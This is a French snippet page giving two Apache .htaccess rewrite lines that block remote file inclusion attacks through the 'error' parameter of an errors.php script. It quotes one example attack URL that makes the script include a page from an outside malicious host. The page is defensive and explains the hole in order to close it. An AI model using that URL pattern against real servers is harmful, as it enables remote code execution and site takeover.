Bloquer le hacking avec le script errors.php
Information sur le code source
Enregistré le 30 Mai 2008 - Vu 21031 fois
| Votre avis: |
|
| |
[66] sources en Apache voir
|
Description du code source
Informations sur le code source
Les failles de sécurité sont nombreuses dans les scripts php. Celle ci permet à un hacker d'éxécuter sur votre serveur un
include externe par l'intermédiaire du paramètre error du script errors.php. Pour vous prémunir d'une prise de contrôle de votre site par un pirate du net il vous faut ajouter ces deux lignes dans votre fichier .htaccess qui vont bloquer l'accès à ce script en retournant un code retour 403.
Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com//errors.php?error=http://www.sitepourri.com/page.txt?
Voir également :
»
Page d'erreur 403 personnalisée
Code Source
.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
|
|
################################################################################
# #
# __ _ __ _ #
# __ ______/ /______ _ ______(_) /_(_)__ ___ _ #
# / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/ #
# \_,_/_/ /_/_/ \__/|__,__/_/ /_/\__/_/_//_/\_, / #
# /___/ #
# #
# #
################################################################################
# #
# Titre : Bloquer le hacking avec le script errors.php #
# #
# URL : /scripts38-Apache.htm #
# Auteur : admin #
# Date édition : 30 Mai 2008 #
# #
################################################################################
RewriteCond %{QUERY_STRING} ^(.*&)?error=http://
RewriteRule ^(.*/)?errors.php - [F,L]
|
Librairie
Langages de programmation
La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets.
Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP..
Plus de 300 références facilement accessibles. Visiter